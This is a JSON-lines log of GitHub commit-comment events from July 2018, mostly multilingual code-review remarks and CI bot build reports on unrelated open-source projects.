{"id":"7935923275","type":"CommitCommentEvent","actor":{"login":"blubber"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29637586,"position":1,"line":473,"path":"circus/arbiter.py","commit_id":"04bb3ca34b89c26d8c709d0418bee49823f21038","created_at":"2018-07-09T07:41:33Z","updated_at":"2018-07-09T07:41:33Z","author_association":"NONE","body":"Afhankelijk van hoevaak deze functie uitgevoerd wordt en hoeveel watchers er zijn: de implementatie is redelijk naief. De performance kan denk ik een stuk beter door een generator te gebruiken zodat je niet al die lijsten hoeft te materializen. Dat gezegd hebbende, dat maakt alleen uit als die functie vaak wordt aangeroepen en/of als er veel watchers zijn.\r\n\r\nIk zeg het omdat in async code de performance vaak wel belangrijk is."}},"created_at":"2018-07-09T07:41:33Z"}
{"id":"7935923468","type":"CommitCommentEvent","actor":{"login":"jreznot"},"repo":{"name":"cuba-platform/masquerade"},"payload":{"comment":{"id":29637587,"position":22,"line":22,"path":"modules/web/src/main/java/com/haulmont/masquerade/components/DataGrid.java","commit_id":"4a55109859cadcbaf827a4fc3c189c90ced306d7","created_at":"2018-07-09T07:41:35Z","updated_at":"2018-07-09T07:41:35Z","author_association":"MEMBER","body":"Please implement `getDetailsRow()` method and `DetailsRow` component interface"}},"created_at":"2018-07-09T07:41:35Z"}
{"id":"7935926963","type":"CommitCommentEvent","actor":{"login":"akihikosato1970"},"repo":{"name":"akihikosato1970/whitepapers"},"payload":{"comment":{"id":29637602,"position":null,"line":null,"path":null,"commit_id":"8d8e926510ada1162b6b4399b06c84c7c66d90e7","created_at":"2018-07-09T07:42:23Z","updated_at":"2018-07-09T07:42:23Z","author_association":"OWNER","body":"Project Kyvalion"}},"created_at":"2018-07-09T07:42:23Z"}
{"id":"7935928302","type":"CommitCommentEvent","actor":{"login":"bencefr"},"repo":{"name":"NordicSemiconductor/pc-ble-driver"},"payload":{"comment":{"id":29637604,"position":13,"line":521,"path":"src/common/transport/h5_transport.cpp","commit_id":"e72d446f6d4de062535e8ec18b3caba8769aad32","created_at":"2018-07-09T07:42:41Z","updated_at":"2018-07-09T07:42:41Z","author_association":"CONTRIBUTOR","body":"This whole sentence could be simplified:\r\n```\r\nif (exit->resetSent && exit->resetWait) {\r\n    return STATE_UNINITIALIZED;\r\n}\r\nreturn STATE_FAILED;\r\n```\r\nor\r\n```\r\nreturn (exit->resetSent && exit->resetWait) ? STATE_UNINITIALIZED : STATE_FAILED;\r\n```"}},"created_at":"2018-07-09T07:42:41Z"}
{"id":"7935928448","type":"CommitCommentEvent","actor":{"login":"abarankab"},"repo":{"name":"KirillR911/Mapio"},"payload":{"comment":{"id":29637605,"position":9,"line":10,"path":"BackEnd/mapBackend/backEnd/models.py","commit_id":"8ae968bbd048f010678299812b16d47d19731d2a","created_at":"2018-07-09T07:42:43Z","updated_at":"2018-07-09T07:42:43Z","author_association":"COLLABORATOR","body":"timestamp не несет смысловой нагрузки"}},"created_at":"2018-07-09T07:42:43Z"}
{"id":"7935935464","type":"CommitCommentEvent","actor":{"login":"jvperrin"},"repo":{"name":"ocf/puppetlabs-rabbitmq"},"payload":{"comment":{"id":29637611,"position":null,"line":null,"path":null,"commit_id":"b5d21f8bb7920a4c800b392d76776a96355e2540","created_at":"2018-07-09T07:44:14Z","updated_at":"2018-07-09T07:44:14Z","author_association":"MEMBER","body":"Looks like this was upstreamed in https://github.com/voxpupuli/puppet-rabbitmq/pull/498\r\n\r\nAnyway, I'm archiving this repo since there's no other changes right now."}},"created_at":"2018-07-09T07:44:14Z"}
{"id":"7935940326","type":"CommitCommentEvent","actor":{"login":"alopezmancisidor"},"repo":{"name":"alopezmancisidor/marbles-20180522202518425"},"payload":{"comment":{"id":29637621,"position":null,"line":null,"path":null,"commit_id":"23dc266fd6fc7e2f803bf588faccf2c0bcd7d908","created_at":"2018-07-09T07:45:22Z","updated_at":"2018-07-09T07:45:22Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/1d98de77-ed5d-4608-a80d-469ca133e34c?env_id=ibm%3Ayp%3Aus-south \"marbles-blockchain-ana\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/68b6cff1-894a-4bdc-8e68-04db7375174f?env_id=ibm%3Ayp%3Aus-south \"marbles-20180522202518425\") deployed [marbles-20180522202518425](https://github.com/alopezmancisidor/marbles-20180522202518425/releases/tag/deploy-ibm-yp-us-south-ana.lopez-es.ibm.com-usa.dev-20180709-074521 \"deploy-ibm-yp-us-south-ana.lopez-es.ibm.com-usa.dev-20180709-074521\") to [usa.dev](https://console.bluemix.net/apps/107328fb-d66f-4546-8292-87df2c7b8667?env_id=ibm:yp:us-south \"ibm:yp:us-south:ana.lopez@es.ibm.com:usa.dev\"), including this commit"}},"created_at":"2018-07-09T07:45:22Z"}
{"id":"7935943710","type":"CommitCommentEvent","actor":{"login":"rajrex205"},"repo":{"name":"rajrex205/build-pipeline"},"payload":{"comment":{"id":29637625,"position":null,"line":null,"path":null,"commit_id":"ae3efbfd0d990959262871eae72586ba14f6d198","created_at":"2018-07-09T07:46:09Z","updated_at":"2018-07-09T07:46:09Z","author_association":"OWNER","body":"this change for himanshu"}},"created_at":"2018-07-09T07:46:09Z"}
{"id":"7935948331","type":"CommitCommentEvent","actor":{"login":"Atomic89"},"repo":{"name":"Atomic89/firstproject"},"payload":{"comment":{"id":29637633,"position":null,"line":null,"path":null,"commit_id":"f3a45759ef1ff092df9200769f6dbe11af2b56f7","created_at":"2018-07-09T07:47:11Z","updated_at":"2018-07-09T07:47:11Z","author_association":"OWNER","body":"add index.php"}},"created_at":"2018-07-09T07:47:11Z"}
{"id":"7935954294","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29637648,"position":9,"line":13,"path":"src/main/java/com/agurova/controllers/AppController.java","commit_id":"6276d98ec3bb2e3f58b39fd1729961f7b4529aca","created_at":"2018-07-09T07:48:33Z","updated_at":"2018-07-09T07:48:33Z","author_association":"COLLABORATOR","body":"@RequestMapping(value = \"/hello\", method = RequestMethod.GET) == @GetMapping(\"/hello\")"}},"created_at":"2018-07-09T07:48:33Z"}
{"id":"7935954940","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29637650,"position":null,"line":null,"path":null,"commit_id":"7058ddbb66084bee9cd507ed69f031ec1262163e","created_at":"2018-07-09T07:48:42Z","updated_at":"2018-07-09T07:48:42Z","author_association":"MEMBER","body":"Not any more they aren't: https://github.com/Ultimaker/Cura/commit/6977b8de6e39d8bd7feab8b10d23ffd755f4b76e"}},"created_at":"2018-07-09T07:48:42Z"}
{"id":"7935956669","type":"CommitCommentEvent","actor":{"login":"rubengdsouza"},"repo":{"name":"rubengdsouza/ExploreIt"},"payload":{"comment":{"id":29637651,"position":1,"line":1,"path":"src/main.cpp","commit_id":"dccdd5e591c807d8fc375e4205b32de6291a5cf4","created_at":"2018-07-09T07:49:05Z","updated_at":"2018-07-09T07:49:05Z","author_association":"OWNER","body":"Wrong comment format"}},"created_at":"2018-07-09T07:49:05Z"}
{"id":"7935956681","type":"CommitCommentEvent","actor":{"login":"rajrex205"},"repo":{"name":"rajrex205/build-pipeline"},"payload":{"comment":{"id":29637652,"position":1,"line":1,"path":"test2.txt","commit_id":"dd0f1b7d4f7ae52abf927102c54b9244043e0f86","created_at":"2018-07-09T07:49:05Z","updated_at":"2018-07-09T07:49:05Z","author_association":"OWNER","body":"csahohaoaohsa"}},"created_at":"2018-07-09T07:49:05Z"}
{"id":"7935957299","type":"CommitCommentEvent","actor":{"login":"rajrex205"},"repo":{"name":"rajrex205/build-pipeline"},"payload":{"comment":{"id":29637654,"position":null,"line":null,"path":null,"commit_id":"dd0f1b7d4f7ae52abf927102c54b9244043e0f86","created_at":"2018-07-09T07:49:12Z","updated_at":"2018-07-09T07:49:12Z","author_association":"OWNER","body":"change"}},"created_at":"2018-07-09T07:49:12Z"}
{"id":"7935957774","type":"CommitCommentEvent","actor":{"login":"Randium"},"repo":{"name":"werewolves-devs/Werewolf_Bot"},"payload":{"comment":{"id":29637656,"position":null,"line":null,"path":null,"commit_id":"78c183c8438bce37e427a05281b6f895cfaac432","created_at":"2018-07-09T07:49:18Z","updated_at":"2018-07-09T07:49:18Z","author_association":"COLLABORATOR","body":"This is a pretty big commit, actually. It wouldn't hurt to test this."}},"created_at":"2018-07-09T07:49:18Z"}
{"id":"7935959972","type":"CommitCommentEvent","actor":{"login":"rajrex205"},"repo":{"name":"rajrex205/build-pipeline"},"payload":{"comment":{"id":29637660,"position":1,"line":1,"path":"test2.txt","commit_id":"dd0f1b7d4f7ae52abf927102c54b9244043e0f86","created_at":"2018-07-09T07:49:46Z","updated_at":"2018-07-09T07:49:46Z","author_association":"OWNER","body":"sahoajdoadoud"}},"created_at":"2018-07-09T07:49:46Z"}
{"id":"7935960777","type":"CommitCommentEvent","actor":{"login":"ApolloLiZhaoyu"},"repo":{"name":"ApolloLiZhaoyu/MIPS_Simulator"},"payload":{"comment":{"id":29637664,"position":null,"line":null,"path":null,"commit_id":"06cde830b70d2e128455bb97a12979995f54c345","created_at":"2018-07-09T07:49:57Z","updated_at":"2018-07-09T07:49:57Z","author_association":"OWNER","body":"更新动态分支预测"}},"created_at":"2018-07-09T07:49:57Z"}
{"id":"7935960876","type":"CommitCommentEvent","actor":{"login":"blubber"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29637665,"position":10,"line":512,"path":"circus/arbiter.py","commit_id":"7d0c777b4cdb11e3e50d9a9d45bc357d1440fde8","created_at":"2018-07-09T07:49:59Z","updated_at":"2018-07-09T07:49:59Z","author_association":"NONE","body":"`on_demand_fds` is een set, is dat nodig? Toevoegen aan een set is relatief traag, zeker in async code kan dat uitmaken. Tenzij die dingen meerdere keren voor kunnen komen dat is een `set` natuurlijk de juiste keuze."}},"created_at":"2018-07-09T07:49:59Z"}
{"id":"7935961274","type":"CommitCommentEvent","actor":{"login":"prncessreginas"},"repo":{"name":"prncessreginas/iPad-iCloud-unlock"},"payload":{"comment":{"id":29637666,"position":1,"line":1,"path":"README.md","commit_id":"42e532521062690d6f4f6ec4d2f94b1cfb0bd7bb","created_at":"2018-07-09T07:50:03Z","updated_at":"2018-07-09T07:50:03Z","author_association":"OWNER","body":"42e532521062690d6f4f6ec4d2f94b1cfb0bd7bb"}},"created_at":"2018-07-09T07:50:03Z"}
{"id":"7935963060","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29637670,"position":11,"line":14,"path":"src/main/java/com/agurova/dal/ImageRepository.java","commit_id":"6276d98ec3bb2e3f58b39fd1729961f7b4529aca","created_at":"2018-07-09T07:50:26Z","updated_at":"2018-07-09T07:50:26Z","author_association":"COLLABORATOR","body":"Repository.addImage(Image) rename save(Image)"}},"created_at":"2018-07-09T07:50:26Z"}
{"id":"7935965135","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29637676,"position":6,"line":12,"path":"src/main/java/com/agurova/dal/ImageRepository.java","commit_id":"6276d98ec3bb2e3f58b39fd1729961f7b4529aca","created_at":"2018-07-09T07:50:50Z","updated_at":"2018-07-09T07:50:50Z","author_association":"COLLABORATOR","body":"deleteImage - overhead. rename to delete"}},"created_at":"2018-07-09T07:50:50Z"}
{"id":"7935965180","type":"CommitCommentEvent","actor":{"login":"blubber"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29637678,"position":9,"line":511,"path":"circus/arbiter.py","commit_id":"7d0c777b4cdb11e3e50d9a9d45bc357d1440fde8","created_at":"2018-07-09T07:50:50Z","updated_at":"2018-07-09T07:50:50Z","author_association":"NONE","body":"`on_demand.update(socket.fileno() for socket in watcher.sockets.values())`"}},"created_at":"2018-07-09T07:50:50Z"}
{"id":"7935965989","type":"CommitCommentEvent","actor":{"login":"rubengdsouza"},"repo":{"name":"rubengdsouza/ExploreIt"},"payload":{"comment":{"id":29637681,"position":1,"line":1,"path":"src/main.cpp","commit_id":"dccdd5e591c807d8fc375e4205b32de6291a5cf4","created_at":"2018-07-09T07:51:00Z","updated_at":"2018-07-09T07:51:00Z","author_association":"OWNER","body":"Done"}},"created_at":"2018-07-09T07:51:00Z"}
{"id":"7935967667","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29637692,"position":3,"line":2,"path":"Lesson3/route.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T07:51:22Z","updated_at":"2018-07-09T07:51:22Z","author_association":"NONE","body":"@stations"}},"created_at":"2018-07-09T07:51:22Z"}
{"id":"7935969988","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29637700,"position":27,"line":25,"path":"src/main/java/com/agurova/dal/impl/ImageRepositoryImpl.java","commit_id":"6276d98ec3bb2e3f58b39fd1729961f7b4529aca","created_at":"2018-07-09T07:51:54Z","updated_at":"2018-07-09T07:51:54Z","author_association":"COLLABORATOR","body":"Overhead cast to Image"}},"created_at":"2018-07-09T07:51:54Z"}
{"id":"7935972756","type":"CommitCommentEvent","actor":{"login":"blubber"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29637710,"position":11,"line":513,"path":"circus/arbiter.py","commit_id":"7d0c777b4cdb11e3e50d9a9d45bc357d1440fde8","created_at":"2018-07-09T07:52:31Z","updated_at":"2018-07-09T07:52:31Z","author_association":"NONE","body":"Dit kan ook in één loop, je gebruikt die `on_demand_fds` set dan om bij te houden wat je al gezien hebt. Of dat beter is laat ik aan jou over. Beide oplossingen zijn geldig, maar hebben andere performance karakteristieken."}},"created_at":"2018-07-09T07:52:31Z"}
{"id":"7935979144","type":"CommitCommentEvent","actor":{"login":"blubber"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29637718,"position":41,"line":666,"path":"circus/arbiter.py","commit_id":"7d0c777b4cdb11e3e50d9a9d45bc357d1440fde8","created_at":"2018-07-09T07:53:59Z","updated_at":"2018-07-09T07:53:59Z","author_association":"NONE","body":"`watchers = (watcher for watcher in self.iter_active_watchers(fd) if watcher.autostart)` scheelt CPU cycles in de loop en geheugen omdat de lijst niet gematerialized wordt."}},"created_at":"2018-07-09T07:53:59Z"}
{"id":"7935983286","type":"CommitCommentEvent","actor":{"login":"atroy"},"repo":{"name":"fusonic/symfony-rate-limit-bundle"},"payload":{"comment":{"id":29637735,"position":15,"line":14,"path":"Fusonic/RateLimitBundle/src/Resources/config/services.yml","commit_id":"166bf80c293372cebd92bb11e1ab66b6b4a85edd","created_at":"2018-07-09T07:54:56Z","updated_at":"2018-07-09T07:54:56Z","author_association":"MEMBER","body":"Couldn't we add a \"REPLACED_BY_COMPILERPASS_SERVICE\" constant, if thats to complicated, we could leave it that way, but then we need a comment!"}},"created_at":"2018-07-09T07:54:56Z"}
{"id":"7935984633","type":"CommitCommentEvent","actor":{"login":"blubber"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29637751,"position":null,"line":null,"path":null,"commit_id":"7d0c777b4cdb11e3e50d9a9d45bc357d1440fde8","created_at":"2018-07-09T07:55:13Z","updated_at":"2018-07-09T07:55:13Z","author_association":"NONE","body":"Grappig dat het zo'n kleine commit is. Ziet er verder goed uit, meeste opmerkingen hebben betrekking op performance, omdat het async code is is dat wel wat belangrijker dan normaal gesproken. Inhoudelijk is er niets mis mee."}},"created_at":"2018-07-09T07:55:13Z"}
{"id":"7935989961","type":"CommitCommentEvent","actor":{"login":"kunkamol2"},"repo":{"name":"kunkamol/kunkamol"},"payload":{"comment":{"id":29637765,"position":null,"line":null,"path":null,"commit_id":"ed61c2f2f1abd0ab6fcd94d650481ae84e10d3e2","created_at":"2018-07-09T07:56:24Z","updated_at":"2018-07-09T07:56:24Z","author_association":"CONTRIBUTOR","body":"hi"}},"created_at":"2018-07-09T07:56:24Z"}
{"id":"7935999307","type":"CommitCommentEvent","actor":{"login":"reyem"},"repo":{"name":"openhab/openhab2-addons"},"payload":{"comment":{"id":29637786,"position":null,"line":null,"path":null,"commit_id":"7596dffa0bfa2d1f38d3331217e9dfdb7fa2b73e","created_at":"2018-07-09T07:58:24Z","updated_at":"2018-07-09T07:58:24Z","author_association":"CONTRIBUTOR","body":"OK :-) thank you for the clarification."}},"created_at":"2018-07-09T07:58:24Z"}
{"id":"7936001530","type":"CommitCommentEvent","actor":{"login":"annProg"},"repo":{"name":"annProg/itop-extensions"},"payload":{"comment":{"id":29637789,"position":null,"line":null,"path":null,"commit_id":"cc58bea8cf278492b96a1d24fddace1b724a7a45","created_at":"2018-07-09T07:58:53Z","updated_at":"2018-07-09T07:58:53Z","author_association":"OWNER","body":"#42 "}},"created_at":"2018-07-09T07:58:53Z"}
{"id":"7936009344","type":"CommitCommentEvent","actor":{"login":"TheAlexBig"},"repo":{"name":"BigDreamsCoders/SmartApe"},"payload":{"comment":{"id":29637804,"position":null,"line":null,"path":null,"commit_id":"7bfbfbff8bd43830fbe815f44e9ca67f7653adfc","created_at":"2018-07-09T08:00:31Z","updated_at":"2018-07-09T08:00:31Z","author_association":"COLLABORATOR","body":"Take this shit already"}},"created_at":"2018-07-09T08:00:31Z"}
{"id":"7936009962","type":"CommitCommentEvent","actor":{"login":"shubham-dixit"},"repo":{"name":"shubham-dixit/ML-Starter-Pack"},"payload":{"comment":{"id":29637806,"position":null,"line":null,"path":null,"commit_id":"73bdda5f9fd4554249a5900d3d71ecb114cc6194","created_at":"2018-07-09T08:00:38Z","updated_at":"2018-07-09T08:00:38Z","author_association":"OWNER","body":"I might have used bigger names but that will be quite easy to understand and also we got rid of the loop to categorize the inputx releasing some complexity."}},"created_at":"2018-07-09T08:00:38Z"}
{"id":"7936012022","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29637809,"position":null,"line":null,"path":null,"commit_id":"87ed032038f5e1e73a6cf06aea73e635679228c5","created_at":"2018-07-09T08:01:03Z","updated_at":"2018-07-09T08:01:03Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1683 of 1683 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-09T08:01:03Z"}
{"id":"7936014491","type":"CommitCommentEvent","actor":{"login":"galibert"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29637812,"position":null,"line":null,"path":null,"commit_id":"fe6851a2d5fa2d0ea7ad21d9969bae6698f32505","created_at":"2018-07-09T08:01:34Z","updated_at":"2018-07-09T08:01:34Z","author_association":"MEMBER","body":"Hmmm.  That doesn't sound good for the wicat driver.  Double bus error\nfault hals the cpu in the real world too...  but the current handling of\nfaults is iffy in the core, so who knows.  I'll have a look.\n\n  OG.\n\n\nOn Mon, Jul 9, 2018 at 7:19 AM, ajrhacker <notifications@github.com> wrote:\n\n> This also seems to have broken wicat rather badly. My attempted crude\n> workaround only got the driver working again so far as the beginning of\n> \"Memory test.\"\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mamedev/mame/commit/fe6851a2d5fa2d0ea7ad21d9969bae6698f32505#commitcomment-29636540>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AI0i8T0a0ILr5dO9syOIwnpEOchP5rEtks5uEufWgaJpZM4VF3zs>\n> .\n>\n"}},"created_at":"2018-07-09T08:01:34Z"}
{"id":"7936020700","type":"CommitCommentEvent","actor":{"login":"Jamaslee"},"repo":{"name":"CarlWux/carlwux.github.io"},"payload":{"comment":{"id":29637820,"position":61,"line":61,"path":"2017/10/12/hello-world/index.html","commit_id":"a041b0b24869e1abb018c03cb71ab79294b157af","created_at":"2018-07-09T08:02:54Z","updated_at":"2018-07-09T08:02:54Z","author_association":"NONE","body":"11"}},"created_at":"2018-07-09T08:02:54Z"}
{"id":"7936024460","type":"CommitCommentEvent","actor":{"login":"xiaobaitu666"},"repo":{"name":"xiaobaitu666/xiaobaitu666.github.io"},"payload":{"comment":{"id":29637825,"position":null,"line":null,"path":null,"commit_id":"50414fc315ee0f1a25d3a5701a7beefb400fc983","created_at":"2018-07-09T08:03:44Z","updated_at":"2018-07-09T08:03:44Z","author_association":"OWNER","body":"login"}},"created_at":"2018-07-09T08:03:44Z"}
{"id":"7936030135","type":"CommitCommentEvent","actor":{"login":"kisoo-han"},"repo":{"name":"CUBRID/cubrid-migration"},"payload":{"comment":{"id":29637835,"position":null,"line":null,"path":null,"commit_id":"1db8d5085efecf8093adf2161809a4761e88961e","created_at":"2018-07-09T08:04:58Z","updated_at":"2018-07-09T08:04:58Z","author_association":"NONE","body":"[TOOLS-4304] Modify incorrect cmt-build archive name (zip -> tgz)"}},"created_at":"2018-07-09T08:04:58Z"}
{"id":"7936031631","type":"CommitCommentEvent","actor":{"login":"haesleinhuepf"},"repo":{"name":"ClearControl/clearcontrol-lightsheet"},"payload":{"comment":{"id":29637837,"position":5,"line":92,"path":"build.gradle","commit_id":"365b814a7084cb64fcb5300e6ed34d787f46e6f9","created_at":"2018-07-09T08:05:16Z","updated_at":"2018-07-09T08:05:16Z","author_association":"MEMBER","body":"Hey @royerloic ,\r\n\r\nbe careful, removing this line breaks the project. ;-)\r\n\r\nI restored it with a5ff2fe1a159fa5265709e807e78bec5cd8c2867 .\r\n\r\nCheers,\r\nRobert"}},"created_at":"2018-07-09T08:05:16Z"}
{"id":"7936035004","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29637845,"position":null,"line":null,"path":null,"commit_id":"abb90e971c3732f046f3c9ce4e02edaf4e6c7a5a","created_at":"2018-07-09T08:06:01Z","updated_at":"2018-07-09T08:06:01Z","author_association":"COLLABORATOR","body":"Oh, I thought both were correct. I'll fix that."}},"created_at":"2018-07-09T08:06:01Z"}
{"id":"7936035881","type":"CommitCommentEvent","actor":{"login":"Radhika8818"},"repo":{"name":"zero-to-mastery/start-here-guidelines"},"payload":{"comment":{"id":29637847,"position":null,"line":null,"path":null,"commit_id":"3c8211cbb471d3d38a4cf1cdc73a5ca7ddf359b2","created_at":"2018-07-09T08:06:13Z","updated_at":"2018-07-09T08:06:13Z","author_association":"CONTRIBUTOR","body":"Add"}},"created_at":"2018-07-09T08:06:13Z"}
{"id":"7936038876","type":"CommitCommentEvent","actor":{"login":"SUPERNOT"},"repo":{"name":"firelotto/firelotto"},"payload":{"comment":{"id":29637856,"position":null,"line":null,"path":null,"commit_id":"707b21cb93c2a2a3428c551ca5e392049b650040","created_at":"2018-07-09T08:06:51Z","updated_at":"2018-07-09T08:06:51Z","author_association":"NONE","body":"Ok"}},"created_at":"2018-07-09T08:06:51Z"}
{"id":"7936039556","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29637858,"position":null,"line":null,"path":null,"commit_id":"abb90e971c3732f046f3c9ce4e02edaf4e6c7a5a","created_at":"2018-07-09T08:07:00Z","updated_at":"2018-07-09T08:07:00Z","author_association":"COLLABORATOR","body":"cool and also can you upload the WER report before adding the lexsel, words, rules etc? I think it's somewhere in our telegram chat"}},"created_at":"2018-07-09T08:07:00Z"}
{"id":"7936039817","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29637860,"position":null,"line":null,"path":null,"commit_id":"87ed032038f5e1e73a6cf06aea73e635679228c5","created_at":"2018-07-09T08:07:04Z","updated_at":"2018-07-09T08:07:04Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2931 of 2931 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T08:07:04Z"}
{"id":"7936042792","type":"CommitCommentEvent","actor":{"login":"caowofansil"},"repo":{"name":"DullDevil/RSADemo"},"payload":{"comment":{"id":29637865,"position":null,"line":null,"path":null,"commit_id":"4627c5a5290feadca9d877724311ce37b230353f","created_at":"2018-07-09T08:07:43Z","updated_at":"2018-07-09T08:07:43Z","author_association":"NONE","body":"你好 ，我现在在做模数和指数生成公钥对字符串进行加密  我下载了你的demo有点问题想请教你下，可以留个联系方式？"}},"created_at":"2018-07-09T08:07:43Z"}
{"id":"7936050500","type":"CommitCommentEvent","actor":{"login":"bornabesic"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29637875,"position":4,"line":201,"path":"string_db.html","commit_id":"510824c654269a811ad90230884f954e4347963b","created_at":"2018-07-09T08:09:28Z","updated_at":"2018-07-09T08:09:28Z","author_association":"OWNER","body":"Yes, real NLP is much more complicated and harder to tune.\r\nBut it could yield us with (entity, relation, entity) triplets from the raw text, which are basically nodes and edges in the graph database.\r\nOkay, let's just focus on the Neo4j handcrafted small database for now."}},"created_at":"2018-07-09T08:09:28Z"}
{"id":"7936052036","type":"CommitCommentEvent","actor":{"login":"Jitrada"},"repo":{"name":"paypal/ipn-code-samples"},"payload":{"comment":{"id":29637880,"position":null,"line":null,"path":null,"commit_id":"a73f4c1eb311393649fbd3f67978b365cc26670b","created_at":"2018-07-09T08:09:48Z","updated_at":"2018-07-09T08:09:48Z","author_association":"NONE","body":"Comment on a73f4c1"}},"created_at":"2018-07-09T08:09:48Z"}
{"id":"7936053429","type":"CommitCommentEvent","actor":{"login":"NickKaramoff"},"repo":{"name":"project-six/it-museum"},"payload":{"comment":{"id":29637885,"position":null,"line":null,"path":null,"commit_id":"e7a43ab729461e8cdba6c3cc6b55ef3e3ba18294","created_at":"2018-07-09T08:10:08Z","updated_at":"2018-07-09T08:10:08Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Подключить домен к серверу](https://trello.com/c/Fa7khHQN/20-%D0%BF%D0%BE%D0%B4%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D1%8C-%D0%B4%D0%BE%D0%BC%D0%B5%D0%BD-%D0%BA-%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80%D1%83)"}},"created_at":"2018-07-09T08:10:08Z"}
{"id":"7936056852","type":"CommitCommentEvent","actor":{"login":"jampii"},"repo":{"name":"Manikiran-M/Practise"},"payload":{"comment":{"id":29637891,"position":null,"line":null,"path":null,"commit_id":"8a3b64f4ef6e57acc21da707fd0c1d366952d9d6","created_at":"2018-07-09T08:10:52Z","updated_at":"2018-07-09T08:10:52Z","author_association":"NONE","body":"Where is foreach ??"}},"created_at":"2018-07-09T08:10:52Z"}
{"id":"7936059371","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-io/initializr"},"payload":{"comment":{"id":29637897,"position":null,"line":null,"path":null,"commit_id":"d38fa831e062fa24de65fa555556bdad995d61fe","created_at":"2018-07-09T08:11:26Z","updated_at":"2018-07-09T08:11:26Z","author_association":"CONTRIBUTOR","body":"👌"}},"created_at":"2018-07-09T08:11:26Z"}
{"id":"7936061934","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/hashlink-debugger"},"payload":{"comment":{"id":29637901,"position":null,"line":null,"path":null,"commit_id":"b4c347deae14f18bee73b92d0c87bb61dd1969e6","created_at":"2018-07-09T08:11:59Z","updated_at":"2018-07-09T08:11:59Z","author_association":"MEMBER","body":"I created the missing `0.4.0` tag. ;)"}},"created_at":"2018-07-09T08:11:59Z"}
